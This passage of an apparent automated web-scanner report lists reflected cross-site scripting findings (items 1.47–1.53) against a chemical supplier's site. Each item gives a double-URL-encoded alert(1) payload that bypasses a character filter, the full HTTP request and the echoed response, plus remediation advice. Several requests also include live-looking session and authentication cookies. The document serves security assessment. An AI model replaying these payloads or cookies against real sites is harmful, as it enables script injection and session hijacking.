Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:26 GMT
Content-Length: 28964
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry7fbca";alert(1)//bb6e913b7f5/chemical-synthesis/chemical-synthesis-catalog.html","E404") ;
   </script>
...[SNIP]...

1.47. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c91c%2522%253balert%25281%2529%252f%252f0941e48733 was submitted in the REST URL parameter 2. This input was echoed as 5c91c";alert(1)//0941e48733 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis5c91c%2522%253balert%25281%2529%252f%252f0941e48733/chemical-synthesis-catalog.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28963
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis5c91c";alert(1)//0941e48733/chemical-synthesis-catalog.html","E404") ;
   </script>
...[SNIP]...

1.48. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/chemical-synthesis-catalog.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/chemical-synthesis-catalog.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aaf17%2522%253balert%25281%2529%252f%252faa51fede4f3 was submitted in the REST URL parameter 3. This input was echoed as aaf17";alert(1)//aa51fede4f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/aaf17%2522%253balert%25281%2529%252f%252faa51fede4f3 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28933
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/aaf17";alert(1)//aa51fede4f3","E404") ;
   </script>
...[SNIP]...

1.49. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 861f7%2522%253balert%25281%2529%252f%252fd30ccf931f9 was submitted in the REST URL parameter 1. This input was echoed as 861f7";alert(1)//d30ccf931f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry861f7%2522%253balert%25281%2529%252f%252fd30ccf931f9/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:28 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry861f7";alert(1)//d30ccf931f9/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.50. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2581%2522%253balert%25281%2529%252f%252fda56d308be3 was submitted in the REST URL parameter 2. This input was echoed as a2581";alert(1)//da56d308be3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesisa2581%2522%253balert%25281%2529%252f%252fda56d308be3/learning-center/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:30 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesisa2581";alert(1)//da56d308be3/learning-center/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.51. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b0367%2522%253balert%25281%2529%252f%252fb9e8ecba5c3 was submitted in the REST URL parameter 3. This input was echoed as b0367";alert(1)//b9e8ecba5c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-centerb0367%2522%253balert%25281%2529%252f%252fb9e8ecba5c3/aldrichimica-acta/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:31 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-centerb0367";alert(1)//b9e8ecba5c3/aldrichimica-acta/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.52. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ecd0%2522%253balert%25281%2529%252f%252f8e4e3844c4c was submitted in the REST URL parameter 4. This input was echoed as 8ecd0";alert(1)//8e4e3844c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-center/aldrichimica-acta8ecd0%2522%253balert%25281%2529%252f%252f8e4e3844c4c/acta-vol-38-no-1.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:08:34 GMT
Content-Length: 28988
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/chemistry/chemical-synthesis/learning-center/aldrichimica-acta8ecd0";alert(1)//8e4e3844c4c/acta-vol-38-no-1.html","E404") ;
   </script>
...[SNIP]...

1.53. http://www.sigmaaldrich.com/chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/acta-vol-38-no-1.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d4308%2522%253balert%25281%2529%252f%252f886483ea1d9 was submitted in the REST URL parameter 5. This input was echoed as d4308";alert(1)//886483ea1d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /chemistry/chemical-synthesis/learning-center/aldrichimica-acta/d4308%2522%253balert%25281%2529%252f%252f886483ea1d9 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
